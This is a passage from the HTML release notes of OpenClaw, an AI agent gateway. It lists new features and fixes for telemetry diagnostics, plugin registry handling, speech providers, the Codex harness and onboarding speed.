<li>Diagnostics/OTEL: emit bounded telemetry exporter health diagnostics for startup and log-export failures without exporting raw error text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export agent harness lifecycle telemetry as bounded <code>openclaw.harness.run</code> spans and <code>openclaw.harness.duration_ms</code> metrics so QA-lab, Codex, and future harnesses share one trace shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/trace: propagate W3C <code>traceparent</code> headers from trusted model-call trace context to provider transports while replacing caller-supplied traceparent values. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/Prometheus: add a bundled <code>diagnostics-prometheus</code> plugin with a protected gateway scrape route for low-cardinality diagnostics metrics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: add <code>openclaw plugins registry</code> for explicit persisted-registry inspection and <code>--refresh</code> repair without making normal startup rescan plugin locations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: make <code>openclaw plugins list</code> read the cold persisted registry snapshot by default, leaving module-aware diagnostics to <code>plugins doctor</code> and <code>plugins inspect</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: move gateway startup plugin planning onto the versioned cold registry index, with postinstall repair for older registry files that predate startup metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: normalize startup and provider plugin enablement through registry aliases so boot paths do not need the legacy manifest alias scan. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: resolve provider ownership, provider discovery scopes, and catalog-hook provider ids from the cold plugin registry instead of rescanning manifests on those paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: keep installed plugin index records focused on install/state/load paths and resolve plugin capabilities from manifests scoped to indexed plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: route cold manifest and capability lookups through the installed plugin index so setup, channels, config, secrets, doctor, and provider metadata paths avoid broad plugin-root scans before runtime execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: speed up <code>models list --all --provider &lt;id&gt;</code> for static manifest-backed providers by loading catalog rows through the installed plugin index instead of broad manifest scans or runtime suppression hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: use OpenClaw Provider Index preview rows as the final cold fallback for installable providers, while keeping user config, installed manifests, and refreshed cache rows above provider-index metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep onboarding and auth-choice setup lists on cold manifest/install metadata and add Provider Index install metadata for not-yet-installed provider plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep provider setup guidance and configure auth imports on cold manifest metadata, with a regression guard against static provider-runtime imports on setup/configure list paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/capabilities: keep capability command registration from importing the models auth runtime until <code>model auth login</code> actually runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/configure: keep web-search configure prompts on cold plugin registry metadata until the user chooses managed search setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/chat commands: refresh the persisted plugin registry after <code>/plugins enable</code> and <code>/plugins disable</code>, matching the CLI mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: mark <code>OPENCLAW_DISABLE_PERSISTED_PLUGIN_REGISTRY</code> as a deprecated break-glass switch and point operators at registry repair instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: expand the central compatibility registry with dated owners, replacements, and maximum three-month removal targets for legacy SDK, manifest, setup, registry-migration, and agent-runtime surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: ignore stale persisted registry reads when plugin policy no longer matches current config, and stamp generated registry files with a do-not-edit warning. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Config/plugins: keep plugin command-alias validation on cold manifest metadata instead of importing the runtime alias resolver. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/plugins: keep web-search credential presence checks on cold config, env, and manifest metadata instead of importing web-search provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: surface provider request identifiers as bounded hashes on model-call diagnostics and span events, without exporting raw request IDs or metric labels. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/diagnostics: add metadata-only <code>model_call_started</code> and <code>model_call_ended</code> hooks for provider/model call telemetry without exposing prompts, responses, headers, request bodies, or raw provider request IDs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded context assembly diagnostics and export <code>openclaw.context.assembled</code> spans with prompt/history sizes but no prompt, history, response, or session-key content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export existing tool-loop diagnostics as <code>openclaw.tool.loop</code> counters and spans without loop messages, session identifiers, params, or tool output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export diagnostic memory samples and pressure as bounded memory histograms, counters, and pressure spans to help spot leak regressions without session or payload data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.token.usage</code> histogram for input/output model usage while keeping session identifiers and aggregate cache counters out of the semantic metric. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add a bounded <code>openclaw.agent</code> label to OpenClaw token metrics so per-agent Grafana dashboards can group usage without exporting session identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Plugins/install: consolidate managed plugin install metadata into the state-managed plugin index at <code>plugins/installs.json</code>, replacing the temporary <code>plugins/installed-index.json</code> path and removing <code>plugins.installs</code> as an authored config surface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.operation.duration</code> histogram for model-call latency in seconds with bounded provider/model/API and error attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add GenAI usage token attributes to model-usage spans, including cache read/write input token counts without session identifiers or prompt/response content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: include bounded GenAI operation, provider, and request-model attributes on model-usage spans so token usage remains self-describing without diagnostic identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep model-usage span GenAI provider attributes aligned with the existing semantic-convention opt-in policy, using legacy <code>gen_ai.system</code> unless latest experimental GenAI conventions are enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep <code>gen_ai.request.model</code> present on GenAI token usage metrics with a bounded <code>unknown</code> fallback when model usage events do not include a model. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs/OTEL: document the GenAI token and model-call duration metrics, model-usage span attributes, and <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code> provider-attribute behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs: refresh the MCP, model provider, doctor, troubleshooting, BlueBubbles, media generation, TTS, subagents, skills, cron/tasks, exec approvals, and voice-call guides with structured Steps, Tabs, and Accordion content.</li>
<li>Diagnostics/trace: add an internal traceparent propagation helper that only formats trusted dispatcher metadata, keeping plugin-emitted diagnostic traces out of outbound propagation by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add bounded outbound message delivery lifecycle diagnostics and export them as low-cardinality delivery spans/metrics without message body, recipient, room, or media-path data. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327526859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71471" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71471/hovercard" href="https://github.com/openclaw/openclaw/pull/71471">#71471</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: emit bounded exec-process diagnostics and export them as <code>openclaw.exec</code> spans without exposing command text, working directories, or container identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327444687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71451/hovercard" href="https://github.com/openclaw/openclaw/pull/71451">#71451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: support <code>OPENCLAW_OTEL_PRELOADED=1</code> so the plugin can reuse an already-registered OpenTelemetry SDK while keeping OpenClaw diagnostic listeners wired. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327404376" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71450" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71450/hovercard" href="https://github.com/openclaw/openclaw/pull/71450">#71450</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Providers/Xiaomi: add MiMo TTS as a bundled speech provider with MP3/WAV output and voice-note Opus transcoding. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116510361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52376" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52376/hovercard" href="https://github.com/openclaw/openclaw/issues/52376">#52376</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4149888425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55614/hovercard" href="https://github.com/openclaw/openclaw/pull/55614">#55614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>.</li>
<li>Providers/ElevenLabs: include <code>eleven_v3</code> in the bundled TTS model catalog so model selection surfaces can offer ElevenLabs v3. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285755724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68321" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68321/hovercard" href="https://github.com/openclaw/openclaw/pull/68321">#68321</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>Providers/Local CLI TTS: add a bundled local command speech provider with file/stdout input, voice-note Opus conversion, and telephony PCM output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158165001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56239" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56239/hovercard" href="https://github.com/openclaw/openclaw/pull/56239">#56239</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>.</li>
<li>Providers/Inworld: add Inworld as a bundled speech provider with streaming TTS synthesis, voice listing, voice-note output, and PCM telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155025815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55972/hovercard" href="https://github.com/openclaw/openclaw/pull/55972">#55972</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>.</li>
<li>Providers/Volcengine: add Volcengine/BytePlus Seed Speech as a bundled TTS provider with API-key auth, native Ogg/Opus voice-note output, and MP3 audio-file output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4150318584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55641" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55641/hovercard" href="https://github.com/openclaw/openclaw/pull/55641">#55641</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>.</li>
<li>Android/Talk Mode: expose Talk Mode in the Voice tab with runtime-owned voice capture modes and microphone foreground-service escalation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-latitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-latitude">@alex-latitude</a>.</li>
<li>Providers/LiteLLM: register <code>litellm</code> as an image-generation provider so <code>image_generate model=litellm/...</code> calls and <code>agents.defaults.imageGenerationModel.fallbacks</code> entries resolve through the LiteLLM proxy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Providers/fal: add Seedance 2.0 reference-to-video models with multi-image, video, and audio reference input mapping plus model-specific capability limits for <code>video_generate</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shivanker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shivanker">@shivanker</a>.</li>
<li>Codex harness: require Codex app-server <code>0.125.0</code> or newer and cover native MCP <code>PreToolUse</code>, <code>PostToolUse</code>, and <code>PermissionRequest</code> payloads through the OpenClaw hook relay.</li>
<li>Agents/Codex: teach prompts and <code>agents_list</code> to surface native Codex app-server availability so agents prefer <code>/codex ...</code> over Codex ACP unless ACP/acpx is explicit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>ACPX/Droid: add Factory Droid to the live ACP bind Docker matrix, including <code>.factory</code> settings staging, <code>FACTORY_API_KEY</code> forwarding, and the single-agent <code>test:docker:live-acp-bind:droid</code> recipe.</li>
<li>TTS/personas: add provider-aware TTS personas with deterministic provider binding merges, <code>/tts persona</code> controls, gateway/CLI persona state, Google Gemini <code>audio-profile-v1</code> prompt wrapping, and OpenAI instruction mapping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318374088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70748/hovercard" href="https://github.com/openclaw/openclaw/pull/70748">#70748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Voice Wake: add trigger-based routing so macOS voice wake phrases can select a configured agent or session target, with Gateway routing APIs and node update events. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4006394318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/30354/hovercard" href="https://github.com/openclaw/openclaw/pull/30354">#30354</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longbiaochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longbiaochen">@longbiaochen</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Plugins/CLI: let flag-driven <code>openclaw channels add</code> install the selected channel plugin from its default source without opening an interactive prompt, fixing published npm Telegram setup in stdin-closed automation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Effet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Effet">@Effet</a>.</li>
<li>Plugins/compat: inventory doctor-side deprecation migrations separately from runtime plugin compatibility so release sweeps preserve needed repairs while enforcing dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: add missing dated compatibility records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: refresh the persisted registry after managed plugin files are removed so ClawHub uninstall cannot leave stale <code>plugins list</code> entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: make plugin install and uninstall config writes conflict-aware, clear stale denylist entries on explicit reinstall/removal, and delete managed plugin files only after config/index commit succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins: fail <code>plugins update</code> when tracked plugin or hook updates error, keep bundled runtime-dependency repair behind restrictive allowlists, and reject package installs with unloadable extension entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, and post-model sanity checks on cold metadata paths unless the user chooses to browse all models, avoiding full plugin/runtime catalog work between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: run manifest-owned provider auth choices through scoped setup providers so selecting OpenAI Codex browser/device auth no longer loads every provider runtime before OAuth starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: keep the post-auth default-model policy lookup on manifest/setup metadata so the next prompt appears without loading broad provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/models: keep skip-auth and provider-scoped model picker prompts off the full global model catalog path, and cache provider catalog hook resolution so setup no longer stalls after auth on large plugin registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
